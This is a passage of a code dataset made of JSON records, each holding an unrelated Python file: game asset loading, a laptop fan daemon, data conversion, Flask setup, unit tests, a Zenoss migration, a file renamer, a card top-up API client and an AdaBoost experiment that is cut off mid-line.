display.Scale))\n\n\n\ndef load(display):\n # Scale all gfx up with scale\n\n # Character set\n character_url = resource_path('images/Charset.png')\n character = pygame.image.load(character_url)\n for y in range(4):\n for x in range(16):\n onechar = character.subsurface(pygame.Rect(x * 8, y * 8, 8, 8))\n bigchar = pygame.transform.scale(onechar, (8 * display.Scale, 8 * display.Scale))\n config.characters.append(bigchar)\n biggerchar = pygame.transform.scale(onechar, (2 * 8 * display.Scale, 2 * 8 * display.Scale))\n config.big_characters.append(biggerchar)\n pygame.display.flip()\n\n # Intro\n intro_background(display)\n\n # Background\n background(display)\n mountains(display)\n\n # Dromedaries\n dromedary_url = resource_path('images/Dromedary.png')\n dromedary_pic = pygame.image.load(dromedary_url)\n for x in range(6):\n dromedary = dromedary_pic.subsurface(pygame.Rect(x * 32, 0, 32, 24))\n big_dromedary = pygame.transform.scale(dromedary, (32 * display.Scale, 24 * display.Scale))\n config.dromedaries.append(big_dromedary)\n pygame.display.flip()\n\n # Explosion\n explosion_url = resource_path('images/ExplodingCamel.png')\n explosion_pic = pygame.image.load(explosion_url)\n for x in range(8):\n exploding_camel = explosion_pic.subsurface(pygame.Rect(x * 16, 0, 16, 16))\n big_exploding_camel = pygame.transform.scale(exploding_camel, (16 * display.Scale, 16 * display.Scale))\n config.exploding_camels.append(big_exploding_camel)\n\n # Lightning\n lightning_url = resource_path('images/Blixt.png')\n lightning_pic = pygame.image.load(lightning_url)\n for y in range(6):\n lightning = lightning_pic.subsurface(pygame.Rect(0, y * 5, 14, 5))\n big_lightning = pygame.transform.scale(lightning, (14 * display.Scale, 5 * display.Scale))\n config.lightning.append(big_lightning)\n\n \n","repo_name":"Lennerskans/dromegadarus","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":6837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21809698384","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\n# Full credit goes to efluffy at https://github.com/efluffy/gpdfand\n# This script is simply re-written in python to avoid perl dependencies\n\nfrom glob import glob\nfrom time import sleep\nimport argparse\nimport io\nimport os.path\nimport signal\nimport sys\n\n# Parse command line arguments\nparser = argparse.ArgumentParser()\nparser.add_argument('--time', type=int, help='Time between temperature checks', default=10)\nparser.add_argument('--turbo', type=int, help='Maximum temperature before turbo boost is disabled', default=60)\nparser.add_argument('--min', type=int, help='Temperature required for minimum fan speed', default=45)\nparser.add_argument('--med', type=int, help='Temperature required for medium fan speed', default=55)\nparser.add_argument('--max', type=int, help='Temperature required for maximum fan speed', default=65)\nargs = parser.parse_args()\n\n# Exit function\ndef exit(*args):\n set_fans(0,0)\n set_no_turbo(0)\n sys.exit(0)\n\n# Get temperature function\ndef get_temp():\n temps = []\n for hwmon in glob('/sys/devices/platform/coretemp.0/hwmon/hwmon*'):\n for temp_input_dev in glob(hwmon + '/temp*_input'):\n with io.open(temp_input_dev, 'r') as core_temp:\n temp = int(core_temp.read()) / 1000\n temps.append(temp)\n if(len(temps) > 0): \t\n return max(temps)\n else:\n return 0\n\n# Set fans function\ndef set_fans(a,b):\n with io.open('/sys/class/gpio/gpio341/value', 'w') as gpio:\n gpio.write(unicode(a))\n with io.open('/sys/class/gpio/gpio342/value', 'w') as gpio:\n gpio.write(unicode(b))\n\n# Set no turbo boost function\ndef set_no_turbo(state):\n with io.open('/sys/devices/system/cpu/intel_pstate/no_turbo', 'w') as no_turbo:\n no_turbo.write(unicode(state))\n\n# Initialization function\ndef init():\n for id in [341,342]:\n if not os.path.isfile('/sys/class/gpio/gpio' + str(id) + '/value'):\n with io.open('/sys/class/gpio/export', 'w') as gpio_export:\n gpio_export.write(unicode(id))\n\n# Perform initialization\ninit()\n\n# Setup exit handler\nsignal.signal(signal.SIGTERM, exit)\n\n# Rinse, repeat.\nwhile True:\n temp = get_temp()\n\n # Set fan speed\n if temp >= args.max or temp == 0:\n set_fans(1,1)\n elif temp >= args.med:\n set_fans(0,1)\n elif temp >= args.min:\n set_fans(1,0)\n else:\n set_fans(0,0)\n\n # Set turbo boost state\n if temp >= args.turbo:\n set_no_turbo(1)\n else:\n set_no_turbo(0)\n\n sleep(args.time)\n","repo_name":"stockmind/gpd-pocket-ubuntu-respin","sub_path":"fan/gpdfand.py","file_name":"gpdfand.py","file_ext":"py","file_size_in_byte":2568,"program_lang":"python","lang":"en","doc_type":"code","stars":348,"dataset":"github-code","pt":"61"} +{"seq_id":"5648759557","text":"import os\nimport re\nimport sys\nimport s3fs\nimport glob\nimport signal\nimport logging\nimport argparse\n\nfrom tqdm.auto import tqdm\nfrom contextlib import closing\nfrom multiprocessing import get_context\n\nimport pandas as pd\nfrom os.path import join, basename, expanduser\n\nfrom collect import save_option_data\n\nlogging.basicConfig(format='%(asctime)s [%(levelname)s] %(message)s')\nlogger = logging.getLogger()\nlogger.setLevel(logging.WARNING)\n\ndef column_remap(col):\n custom = {\n 'TheoreticalVol': 'theoretical_vol',\n 'NonStandard': 'non_standard'\n }\n if col in custom:\n return custom[col]\n return col.lower()\n\ndef convert(item):\n file, dest, s3_client = item\n\n df = pd.read_csv(file).rename(columns=column_remap)\n date, symbol = df.date[0], re.sub('\\.csv.*', '', basename(file))\n fn = join(dest, symbol, f'{date}.parquet')\n\n if s3_client is not None and s3_client.exists(fn):\n logger.warning(f'Skipping {fn}')\n return\n logger.info(f'{file} => {fn}')\n save_option_data(df, fn, s3_client=s3_client)\n\ndef get_file_list(pattern):\n return glob.glob(expanduser(pattern))\n\ndef main():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('file', nargs='+',\n help='CSV options files or to convert (wildcard OK)')\n parser.add_argument('--parallelism', default=4, type=int,\n help='how many files at a time to process')\n parser.add_argument('--dest', default='.',\n help='Where to save the converted files')\n\n args = parser.parse_args()\n\n s3_client = None\n if args.dest.startswith('s3://'):\n s3_client = s3fs.S3FileSystem(client_kwargs={\n 'endpoint_url': os.getenv('ENDPOINT_URL')\n })\n files = sum([get_file_list(p) for p in args.file], [])\n work_items = [(f, args.dest, s3_client) for f in files]\n processes = min(args.parallelism, len(work_items))\n\n with closing(get_context('spawn').Pool(processes)) as p:\n status = {'desc': 'Processing', 'total': len(files)}\n _ = list(tqdm(p.imap(convert, work_items), **status))\n\n\ndef signal_handler(signal, frame):\n sys.exit(0)\n\nif __name__ == '__main__':\n signal.signal(signal.SIGINT, signal_handler)\n main()\n\n","repo_name":"loukad/options-collector","sub_path":"upload_historical.py","file_name":"upload_historical.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19650378896","text":"# -*- encoding: utf-8 -*-\nfrom flask import Flask\n\nfrom App.ext import init_ext, scheduler\nfrom App.settings import envs\nfrom App.views import init_views\nfrom datetime import datetime\n\n\ndef print_time():\n time_now = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n print(\"time:{}\".format(time_now))\n\n\ndef create_app(env):\n app = Flask(__name__, static_folder=\"../static\")\n app.config.from_object(envs.get(env))\n\n init_ext(app)\n\n init_views(app)\n scheduler.remove_job(id='job01')\n scheduler.add_job(id=\"job01\", func=print_time, trigger='cron', day_of_week=\"*\", hour=14,\n minute=18, second=59)\n scheduler.start()\n return app\n","repo_name":"aaaasule/stu_flask","sub_path":"day22/App/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39575082594","text":"# pylint: disable=protected-access\n\nimport pytest\n\nfrom zetta_utils.layer.db_layer import DBLayer, build_db_layer\n\n\ndef test_write_scalar(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n layer = build_db_layer(backend)\n\n layer[\"key\"] = \"val\"\n assert backend.write.call_args.kwargs[\"data\"] == [{\"value\": \"val\"}]\n\n\ndef test_write_list(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n\n layer = build_db_layer(backend)\n\n idx_user = [\"key0\", \"key1\"]\n data_user = [\"val0\", \"val1\"]\n layer[idx_user] = data_user\n assert backend.write.call_args.kwargs[\"data\"] == [{\"value\": \"val0\"}, {\"value\": \"val1\"}]\n\n\ndef test_write_single_row(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n\n layer = build_db_layer(backend)\n\n row_key = \"key\"\n col_keys = (\"col0\", \"col1\")\n idx_user = (row_key, col_keys)\n\n data_user = {\n \"col0\": \"val0\",\n \"col1\": \"val1\",\n }\n\n layer[idx_user] = data_user\n assert backend.write.call_args.kwargs[\"data\"] == [{\"col0\": \"val0\", \"col1\": \"val1\"}]\n\n\ndef test_write_rows(mocker) -> None:\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n layer = build_db_layer(backend)\n\n row_keys = [\"key0\", \"key1\"]\n idx_user = (row_keys, (\"col0\", \"col1\"))\n\n data_user = [\n {\"col0\": \"val0\", \"col1\": \"val1\"},\n {\"col0\": \"val0\"},\n ]\n\n layer[idx_user] = data_user\n assert backend.write.call_args.kwargs[\"data\"] == data_user\n\n\ndef test_write_exc(mocker):\n backend = mocker.MagicMock()\n backend.write = mocker.MagicMock()\n\n layer = build_db_layer(backend)\n with pytest.raises(TypeError):\n layer[\"key\"] = object # type: ignore\n\n with pytest.raises(ValueError):\n layer[\"key\"] = mocker.MagicMock()\n\n\n@pytest.mark.parametrize(\n \"idx_user, data, expected\",\n [\n [\n \"key0\",\n [{\"value\": \"val0\"}],\n \"val0\",\n ],\n [\n \"key42\",\n [{\"value\": 42}],\n 42,\n ],\n [\n [\"key0\", \"key42\"],\n [{\"value\": \"val0\"}, {\"value\": 42}],\n [\"val0\", 42],\n ],\n [\n (\"key1\", (\"col0\", \"col1\")),\n [{\"col0\": \"val0\", \"col1\": \"val1\"}],\n {\"col0\": \"val0\", \"col1\": \"val1\"},\n ],\n [\n ([\"key1\", \"key2\"], (\"col0\", \"col1\")),\n [{\"col0\": \"val0\", \"col1\": \"val1\"}, {\"col0\": None, \"col1\": \"val2\"}],\n [{\"col0\": \"val0\", \"col1\": \"val1\"}, {\"col0\": None, \"col1\": \"val2\"}],\n ],\n ],\n)\ndef test_db_read_convert(\n idx_user,\n data,\n expected,\n mocker,\n):\n layer = DBLayer(backend=mocker.MagicMock())\n result = layer._convert_read_data(idx_user, data)\n assert result == expected\n","repo_name":"ZettaAI/zetta_utils","sub_path":"tests/unit/layer/db_layer/test_build.py","file_name":"test_build.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"9325906037","text":"import os, sys, time\n\n## bulk renaming not implemented yet\ndef renamefiles():\n if sys.platform == \"win32\" : os.system(\"cls\")\n elif sys.platform == \"linux\" : os.system(\"clear\")\n\n print(\"=============================================================\")\n print(\" -- File Renaming Tool -- \")\n print(\"=============================================================\")\n\n print(\"\\n Type 'Exit' at any time to return to the main menu! \")\n print(\"=============================================================\")\n print(\" State the name of a file and its file extention \")\n print(\" you would like to rename! \")\n print(\"=============================================================\")\n file = str(input(\">> \"))\n\n if file.upper() == \"EXIT\":\n return\n\n if sys.platform == \"win32\" : os.system(\"cls\")\n elif sys.platform == \"linux\" : os.system(\"clear\")\n\n while True:\n print(\"=============================================================\")\n newFile = str(input(f\"What would you like to rename the file '{file}' to? >> \"))\n\n if sys.platform == \"win32\" : os.system(\"cls\")\n elif sys.platform == \"linux\" : os.system(\"clear\")\n\n try: \n \n x = newFile.find(\".\")\n\n if x == -1:\n name = newFile\n ext = file[file.find(\".\"):]\n \n else:\n name = newFile[:x]\n ext = newFile[x:]\n\n if sys.platform == \"win32\": os.rename(f\"{os.path.dirname(os.getcwd())}\\\\{file}\", f\"{os.path.dirname(os.getcwd())}\\\\{name}{ext}\")\n elif sys.platform == \"linux\": os.rename(f\"{os.path.dirname(os.getcwd())}/{file}\", f\"{os.path.dirname(os.getcwd())}/{name}{ext}\")\n \n print(\"=============================================================\")\n print(f\"Old file name >> {file}\\nNew File name {name}{ext}\")\n print(\"=============================================================\")\n print(\"\\n\")\n\n for i in range(0, 3):\n print(f\"Returning to main menu in {3-i} second[s]!\", end=\"\\r\")\n time.sleep(1)\n print(\"=============================================================\")\n return 0\n\n except:\n for i in range(1, 4): \n print(f\"File name: {file} doesnt exist / couldnt be renamed, returning to main menu\", \".\"*i, end=\"\\r\")\n time.sleep(1)\n \n return\n\n return","repo_name":"CallumB04/FileHandlingTool","sub_path":"Scripts/rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17614977073","text":"import logging\nlog = logging.getLogger(\"zen.migrate\")\n\nimport Migrate\nimport servicemigration as sm\nsm.require(\"1.0.0\")\n\n\nclass CheckHBaseTablesExist(Migrate.Step):\n \"\"\"\n Add existence of HBase tables to the Prereqs of OpenTSDB reader.\n See ZEN-24094\n \"\"\"\n\n version = Migrate.Version(108, 0, 0)\n\n def cutover(self, dmd):\n try:\n ctx = sm.ServiceContext()\n except sm.ServiceMigrationError:\n log.info(\"Couldn't generate service context, skipping.\")\n return\n\n # Find the services to edit.\n # For \"lite\" services, there is a single opentsdb service and, it should\n # not be edited. For \"full\" services, the opentsdb service is an organizer\n # with reader and writer subservices. The reader services should be\n # edited.\n opentsdbs = [i for i in ctx.services if i.name == 'opentsdb' ]\n readers = [i for i in ctx.services if i.name == 'reader' and\n ctx.getServiceParent(i) in opentsdbs]\n\n changed = False\n\n for reader in readers:\n reader.prereqs = [sm.Prereq(name='HBase Regionservers up', script='{{with $rss := (child (child (parent (parent .)) \"HBase\") \"RegionServer\").Instances }}wget -q -O- http://localhost:61000/status/cluster | grep \\'{{$rss}} live servers\\'{{end}}'), sm.Prereq(name='HBase tables exist', script='wget -q -O- http://localhost:61000 | [[ $(grep -c -E -o \\\"\\\\b${CONTROLPLANE_TENANT_ID}-tsdb(-|\\\\s|$)\\\") == 4 ]]')]\n changed = True\n\n if changed:\n ctx.commit()\n\nCheckHBaseTablesExist()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/checkHBaseTablesExist.py","file_name":"checkHBaseTablesExist.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"74333296513","text":"__author__ = \"fitrah.wahyudi.imam@gmail.com\"\n\nimport logging\nfrom PyQt5.QtCore import QObject, pyqtSignal\nfrom _nNetwork import _NetworkAccess\nfrom _dDevice import _QPROX\nfrom _cConfig import _Common\nfrom _tTools import _Helper\nfrom time import sleep\nfrom _cCommand import _Command\n\n\nclass TopupSignalHandler(QObject):\n __qualname__ = 'TopupSignalHandler'\n SIGNAL_DO_TOPUP_BNI = pyqtSignal(str)\n\n\nTP_SIGNDLER = TopupSignalHandler()\nLOGGER = logging.getLogger()\n\nTOPUP_URL = _Common.TOPUP_URL\nTOPUP_TOKEN = _Common.TOPUP_TOKEN\nTOPUP_MID = _Common.TOPUP_MID\n# TOPUP_TID = '0123456789abcdefghijkl' -> Change Using Terminal ID\nTOPUP_TID = _Common.TID\n# ==========================================================\n\n\ndef start_define_topup_slot_bni():\n _Helper.get_pool().apply_async(define_topup_slot_bni)\n\n\nBNI_UPDATE_BALANCE_PROCESS = False\n\n\ndef define_topup_slot_bni():\n while True:\n if not BNI_UPDATE_BALANCE_PROCESS:\n if _Common.BNI_SAM_1_WALLET <= _Common.MINIMUM_AMOUNT:\n LOGGER.debug(('START_BNI_SAM_AUTO_UPDATE_SLOT_1', str(_Common.MINIMUM_AMOUNT), str(_Common.BNI_SAM_1_WALLET)))\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('INIT_TOPUP_BNI_1')\n do_topup_bni(slot=1, force=True)\n if _Common.BNI_SINGLE_SAM is False and _Common.BNI_SAM_2_WALLET <= _Common.MINIMUM_AMOUNT:\n LOGGER.debug(('START_BNI_SAM_AUTO_UPDATE_SLOT_2', str(_Common.MINIMUM_AMOUNT), str(_Common.BNI_SAM_2_WALLET)))\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('INIT_TOPUP_BNI_2')\n do_topup_bni(slot=2, force=True)\n sleep(5)\n\n\ndef start_do_topup_bni(slot):\n _Helper.get_pool().apply_async(do_topup_bni, (int(slot),))\n\n\ndef start_do_force_topup_bni():\n slot = _Common.BNI_ACTIVE\n force = True\n _Helper.get_pool().apply_async(do_topup_bni, (int(slot), force, ))\n\n\ndef do_topup_bni(slot=1, force=False):\n global BNI_UPDATE_BALANCE_PROCESS\n try:\n if force is False and _Common.ALLOW_DO_TOPUP is False:\n LOGGER.warning(('do_topup_bni', slot, _Common.ALLOW_DO_TOPUP))\n return 'TOPUP_NOT_ALLOWED'\n _get_card_data = _QPROX.get_card_info(slot=slot)\n if _get_card_data is False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_GET_CARD_INFO_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_GET_CARD_INFO_BNI'\n BNI_UPDATE_BALANCE_PROCESS = True\n _Common.BNI_ACTIVE_WALLET = 0\n _result_pending = pending_balance({\n 'card_no': _get_card_data['card_no'],\n 'amount': _Common.BNI_TOPUP_AMOUNT,\n 'card_tid': _Common.TID_BNI\n })\n if _result_pending is False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_PENDING_BALANCE_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_PENDING_BALANCE_BNI'\n _result_ubal = update_balance({\n 'card_no': _get_card_data['card_no'],\n 'card_info': _get_card_data['card_info'],\n 'reff_no': _result_pending['reff_no']\n })\n if _result_ubal is False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_UPDATE_BALANCE_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_UPDATE_BALANCE_BNI'\n _send_crypto = _QPROX.send_cryptogram(_get_card_data['card_info'], _result_ubal['dataToCard'], slot=slot)\n if _send_crypto is False:\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_SEND_CRYPTOGRAM_BNI')\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_SEND_CRYPTOGRAM_BNI'\n else:\n BNI_UPDATE_BALANCE_PROCESS = False\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('SUCCESS_TOPUP_BNI')\n _Common.upload_topup_error(slot, 'RESET')\n return 'SUCCESS_TOPUP_BNI'\n except Exception as e:\n LOGGER.warning(('do_topup_bni', str(slot), str(e)))\n TP_SIGNDLER.SIGNAL_DO_TOPUP_BNI.emit('FAILED_TOPUP_BNI')\n\n\ndef do_reset_pending_master():\n slot = 1\n _Helper.get_pool().apply_async(reset_pending_balance, (slot,))\n\n\ndef do_reset_pending_slave():\n slot = 2\n _Helper.get_pool().apply_async(reset_pending_balance, (slot,))\n\n\ndef reset_pending_balance(slot=1):\n try:\n _get_card_data = _QPROX.get_card_info(slot=slot)\n if _get_card_data is False:\n return 'FAILED_GET_CARD_INFO_BNI'\n _result_pending = pending_balance({\n 'card_no': _get_card_data['card_no'],\n 'amount': '10',\n 'card_tid': _Common.TID_BNI,\n 'activation': '1'\n })\n if _result_pending is False:\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_PENDING_BALANCE_BNI'\n _result_ubal = update_balance({\n 'card_no': _get_card_data['card_no'],\n 'card_info': _get_card_data['card_info'],\n 'reff_no': _result_pending['reff_no']\n })\n if _result_ubal is False:\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_UPDATE_BALANCE_BNI'\n _send_crypto = _QPROX.send_cryptogram(_get_card_data['card_info'], _result_ubal['dataToCard'], slot=slot)\n if _send_crypto is False:\n _Common.upload_topup_error(slot, 'ADD')\n return 'FAILED_SEND_CRYPTOGRAM_BNI'\n else:\n _Common.upload_topup_error(slot, 'RESET')\n _Common.ALLOW_DO_TOPUP = True\n return 'SUCCESS_RESET_PENDING_BNI'\n except Exception as e:\n LOGGER.warning(('reset_pending_balance', str(slot), str(e)))\n return False\n\n\ndef pending_balance(_param, bank='BNI', mode='TOPUP'):\n if bank == 'BNI' and mode == 'TOPUP':\n try:\n # param must be\n # \"token\":\"<>\",\n # \"mid\":\"<>\",\n # \"tid\":\"<>\",\n # \"amount\":\"30000\",\n # \"card_no\":\"7546990000025583\"\n # ---> Need Card Number And Amount\n _param['token'] = TOPUP_TOKEN\n _param['mid'] = TOPUP_MID\n _param['tid'] = TOPUP_TID\n status, response = _NetworkAccess.post_to_url(url=TOPUP_URL + 'v1/topup-bni/pending', param=_param)\n LOGGER.debug(('pending_balance', str(_param), str(status), str(response)))\n if status == 200 and response['response']['code'] == 200:\n # {\n # \"response\":{\n # \"code\":200,\n # \"message\":\"Pending Balance Success\",\n # \"latency\":2.2753360271454\n # },\n # \"data\":{\n # \"amount\":\"30000\",\n # \"card_no\":\"7546990000025583\",\n # \"reff_no\":\"20181207180324000511\",\n # \"provider_id\":\"BNI_TAPCASH\",\n # \"trx_pin\":\"12345\"\n # }\n # }\n return response['data']\n else:\n return False\n except Exception as e:\n LOGGER.warning((bank, mode, e))\n return False\n else:\n LOGGER.warning(('Unknown', bank, mode))\n return False\n\n\ndef update_balance(_param, bank='BNI', mode='TOPUP'):\n if bank == 'BNI' and mode == 'TOPUP':\n try:\n # param must be\n # \"token\":\"<>\",\n # \"mid\":\"<>\",\n # \"tid\":\"<>\",\n # \"reff_no\":\"20181207180324000511\",\n # \"card_info\":\"0001754699000002558375469900000255835A929C0E8DCEC98A95A574DE68D93CBB0\n # 00000000100000088889999040000002D04C36E88889999040000002D04C36E000000000000000000\n # 0079EC3F7C7EED867EBC676CD434082D2F\",\n # \"card_no\":\"7546990000025583\"\n # ---> Need Card Number, Card Info, Reff_No\n _param['token'] = TOPUP_TOKEN\n _param['mid'] = TOPUP_MID\n _param['tid'] = TOPUP_TID\n status, response = _NetworkAccess.post_to_url(url=TOPUP_URL + 'v1/topup-bni/update', param=_param)\n LOGGER.debug(('update_balance', str(_param), str(status), str(response)))\n if status == 200 and response['response']['code'] == 200:\n # {\n # \"response\":{\n # \"code\":200,\n # \"message\":\"Update Balance Success\",\n # \"latency\":1.4313230514526\n # },\n # \"data\":{\n # \"amount\":\"30000\",\n # \"auth_id\":\"164094\",\n # \"dataToCard\":\"06015F902D04C57100000000000000001C54522709845B42F240343E96F11041\"\n # }\n # _Common.ALLOW_DO_TOPUP = True\n return response['data']\n else:\n _Common.ALLOW_DO_TOPUP = False\n return False\n except Exception as e:\n LOGGER.warning((bank, mode, e))\n return False\n else:\n LOGGER.warning(('Unknown', bank, mode))\n return False\n\n\ndef reversal_balance(_param, bank='BNI', mode='TOPUP'):\n if bank == 'BNI' and mode == 'TOPUP':\n try:\n # param must be\n # \"token\":\"<>\",\n # \"mid\":\"<>\",\n # \"tid\":\"<>\",\n # \"card_no\":\"7546990000025583\",\n # \"amount\":\"30000\",\n # \"auth_id\":\"164094\",\n # \"card_data\":\"06015F902D04C57100000000000000001C54522709845B42F240343E96F11041\"\n # ---> Need Card Number, Card Data, Amount, Auth ID\n _param['token'] = TOPUP_TOKEN\n _param['mid'] = TOPUP_MID\n _param['tid'] = TOPUP_TID\n status, response = _NetworkAccess.post_to_url(url=TOPUP_URL + 'v1/topup-bni/reversal', param=_param)\n LOGGER.debug(('reversal_balance', str(_param), str(status), str(response)))\n if status == 200 and response['response']['code'] == 200:\n # {\n # \"response\":{\n # \"code\":200,\n # \"message\":\"Reversal Balance Success\",\n # \"latency\":2.8180389404297\n # },\n # \"data\":{\n # \"card_no\":\"7546990000025583\",\n # \"amount\":\"30000\"\n # }\n # }\n return response['data']\n else:\n return False\n except Exception as e:\n LOGGER.warning((bank, mode, e))\n return False\n else:\n LOGGER.warning(('Unknown', bank, mode))\n return False\n\n\ndef start_master_activation_bni():\n slot = 1\n _Helper.get_pool().apply_async(refill_zero_bni, (slot,))\n\n\ndef start_slave_activation_bni():\n slot = 2\n _Helper.get_pool().apply_async(refill_zero_bni, (slot,))\n\n\ndef refill_zero_bni(slot=1):\n _slot = slot - 1\n param = _QPROX.QPROX['REFILL_ZERO'] + '|' + str(_slot) + '|' + _QPROX.TID_BNI\n response, result = _Command.send_request(param=param, output=None)\n if response == 0:\n _Common.NFC_ERROR = ''\n _QPROX.QP_SIGNDLER.SIGNAL_REFILL_ZERO.emit('REFILL_ZERO|SUCCESS')\n sleep(2)\n reset_pending_balance(slot=slot)\n else:\n if slot == 1:\n _Common.NFC_ERROR = 'REFILL_ZERO_SLOT_1_BNI_ERROR'\n if slot == 2:\n _Common.NFC_ERROR = 'REFILL_ZERO_SLOT_2_BNI_ERROR'\n _QPROX.QP_SIGNDLER.SIGNAL_REFILL_ZERO.emit('REFILL_ZERO_ERROR')\n\n\n","repo_name":"ciwanridwan/Unified-Vm","sub_path":"_sService/_TopupService.py","file_name":"_TopupService.py","file_ext":"py","file_size_in_byte":11456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"40823923032","text":"import unittest\nfrom tests.unit_test_helper.console_test_helper import *\n\n\nclass TestOutput(unittest.TestCase):\n\n def test(self):\n temp_globals, temp_locals, content, output = execfile(\"lab16/ch016_t11_practice_makes_perfect.py\")\n self.assertListEqual([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21],\n temp_locals['to_21'])\n self.assertListEqual([1, 3, 5, 7, 9, 11, 13, 15, 17, 19, 21], temp_locals['odds'])\n self.assertListEqual([8, 9, 10, 11, 12, 13, 14], temp_locals['middle_third'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"wongcyrus/ite3101_introduction_to_programming","sub_path":"tests/lab16/test_ch016_t11_practice_makes_perfect.py","file_name":"test_ch016_t11_practice_makes_perfect.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"39821981557","text":"from time import time\nimport os\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import ensemble\nfrom sklearn import tree\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder\nfrom sklearn.metrics import accuracy_score\n\nimport generate_plots as gp\n\n# EVIL CODE\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nroot_path = os.getcwd()\n\nprint(\"########## Importing Data... ##########\")\n\n# census data\nadult_df = pd.read_csv(\"data/census_data/adult.data\")\nadult_df.dropna(inplace=True)\nadult_test_df = pd.read_csv(\"data/census_data/adult.test\")\nadult_test_df.dropna(inplace=True)\n\n# flag data\nflag_df = pd.read_csv(\"data/flag_data/flag.data\")\nflag_df.dropna(inplace=True)\n\nprint(\"########## Splitting Data... ##########\")\nadult_x = adult_df.drop(['income'], axis=1)\n# adult_x = adult_df\nadult_y = adult_df['income']\nadult_y = adult_y.to_frame()\nadult_tst_x = adult_test_df.drop(['income'], axis=1)\n# adult_tst_x = adult_test_df\nadult_tst_y = adult_test_df['income']\nadult_tst_y = adult_tst_y.to_frame()\n\nflag_x = flag_df.drop(['religion'], axis=1)\nflag_y = flag_df['religion']\nflag_x, flag_tst_x, flag_y, flag_tst_y = train_test_split(flag_df,\n flag_y,\n test_size=0.33)\n\nprint(\"########## One-hot encoding... ##########\")\ncategorical_feature_mask = (adult_x.dtypes == object)\ncategorical_cols = adult_x.columns[categorical_feature_mask].tolist()\ncolumn_mask = []\nfor column_name in list(adult_x.columns.values):\n column_mask.append(column_name in categorical_cols)\n\nohe = OneHotEncoder(categorical_features=column_mask, handle_unknown='ignore')\nfor col in categorical_cols:\n le = LabelEncoder()\n adult_x[col] = le.fit_transform(adult_x[col])\n adult_tst_x[col] = le.fit_transform(adult_tst_x[col])\nadult_x = ohe.fit_transform(adult_x)\nadult_tst_x = ohe.transform(adult_tst_x)\n\n\ncategorical_feature_mask = (flag_x.dtypes == object)\ncategorical_cols = flag_x.columns[categorical_feature_mask].tolist()\ncolumn_mask = []\nfor column_name in list(flag_x.columns.values):\n column_mask.append(column_name in categorical_cols)\n\nohe = OneHotEncoder(categorical_features=column_mask, handle_unknown='ignore')\nfor col in categorical_cols:\n le = LabelEncoder()\n flag_x[col] = le.fit_transform(flag_x[col])\n flag_tst_x[col] = le.fit_transform(flag_tst_x[col])\nflag_x = ohe.fit_transform(flag_x)\nflag_tst_x = ohe.transform(flag_tst_x)\n\nprint(\"########## Plotting Learning Curves... ##########\")\nboost_adult = ensemble.AdaBoostClassifier()\nboost_flag = ensemble.AdaBoostClassifier(learning_rate=0.8, n_estimators=10)\n\nstart_time = time()\n\ndt_adult_final = tree.DecisionTreeClassifier(max_depth=7, max_leaf_nodes=5)\nboost_adult_final = ensemble.AdaBoostClassifier(base_estimator=dt_adult_final, learning_rate=1.1, n_estimators=100)\nboost_adult_final.fit(adult_x.todense(), adult_y.values.ravel())\nadult_pred_y = boost_adult_final.predict(adult_tst_x.todense())\nprint(\"Adult boosting accuracy: {}\".format(accuracy_score(adult_tst_y, adult_pred_y)))\n\nprint(\"Time elapsed: {}\".format(time() - start_time))\nstart_time = time()\n\nboost_flag_final = ensemble.AdaBoostClassifier(learning_rate=0.8, n_estimators=10)\nboost_flag_final.fit(flag_x.todense(), flag_y.ravel())\nflag_pred_y = boost_flag_final.predict(flag_tst_x.todense())\nprint(\"Flag boosting accuracy: 